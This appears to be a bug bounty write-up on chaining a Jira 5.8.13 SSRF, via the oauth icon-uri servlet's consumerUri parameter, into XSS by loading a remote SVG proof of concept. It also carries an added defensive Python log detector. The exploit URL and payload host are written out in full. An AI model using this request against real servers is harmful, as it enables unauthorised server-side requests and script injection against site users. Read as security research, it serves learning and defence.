How I converted SSRF to XSS in Jira.

Ashish Kunwar
2 min read · Jun 1, 2018


I'm very much into bug bounty and I spend my whole day doing this: finding new and interesting stuff and keeping on upgrading my recon techniques.

So this site was random and had a vast number of subdomains to test:

domain: *.example.com

So I used some sites to find subdomains:

1. FindSubdomains.com

2. DnsDumpster

3. VirusTotal

4. Acunetix manual tool

Before I start: Acunetix does subdomain scans, so just set the timeout to 20 and you will get a really big list with banners and response headers. (It does half of the work for you.)

Now, I'd been through lots of subdomains and I was specifically looking for any Jira environment, and I found one.

Let's say wiki.example.com.

So I looked at the version and it was "5.8.13", which is affected by SSRF...

I remembered Alyssa Herrera's writeup "Piercing the Veil: Server Side Request Forgery to NIPRNet access".

So I quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And boom, I got the Google page and I'm like:

Hell yeah!

So I followed the writeup but couldn't manage to get any sensitive info.

[Yes, I tried everything... nothing worked.]

And that's where I was like "why, God? why?"

And then suddenly it came to my mind and I went to the Brute XSS blog,

copied "http://brutelogic.com.br/poc.svg" and put it in place of https://google.com,

and boom, I got XSS.

SSRF to XSS in #Vain
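As an added example (not code from the original post), here is a small Python detector a defender could run over Jira access logs to spot the pattern described above: requests to the icon-uri servlet whose consumerUri points at a host outside an allowlist, or which fetch an SVG that the servlet would hand back to the browser. The log lines and the allowlist are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical allowlist: hosts this instance may legitimately fetch
# application-link icons from (a real one holds the registered OAuth consumers).
ALLOWED_ICON_HOSTS = {"wiki.example.com", "jira.example.com"}

# Constructed access-log lines in common-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2018:10:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2Fjira.example.com%2Ficon.png HTTP/1.1" 200 812
10.0.0.9 - - [01/Jun/2018:10:00:07 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2Fgoogle.com HTTP/1.1" 200 11492
10.0.0.9 - - [01/Jun/2018:10:00:13 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg HTTP/1.1" 200 230
10.0.0.2 - - [01/Jun/2018:10:00:20 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def analyse_line(line):
    """Return a finding dict for a suspicious icon-uri request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not target.path.endswith("/plugins/servlet/oauth/users/icon-uri"):
        return None
    # parse_qs already percent-decodes the parameter value
    consumer = parse_qs(target.query).get("consumerUri", [""])[0]
    fetched = urlsplit(consumer)
    reasons = []
    # a missing or unparseable host (hostname None) is also flagged
    if fetched.hostname not in ALLOWED_ICON_HOSTS:
        reasons.append("consumerUri host not in allowlist")
    if fetched.path.lower().endswith(".svg"):
        reasons.append("fetched resource is SVG (may carry script)")
    if not reasons:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"),
            "host": fetched.hostname, "reasons": reasons}

def analyse_log(text):
    """Run analyse_line over every line and keep the findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```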

So it worked and I got a bounty of $50, which is low (and that company sucks).

Anyway, it doesn't matter at all; it was all about exploration, learning new things and gaining experience.

#sharing is #caring

Hope you guys enjoyed it and learned something new. [For those who don't know: the rest are leets.]

Thank you

./Logout

Follow me on Twitter: Ashish Kunwar

And if you have any questions, DMs are open only for followers.


Written by Ashish Kunwar

I'm a security researcher and exploit developer, and love fuzzing and breaking things | bug hunter |
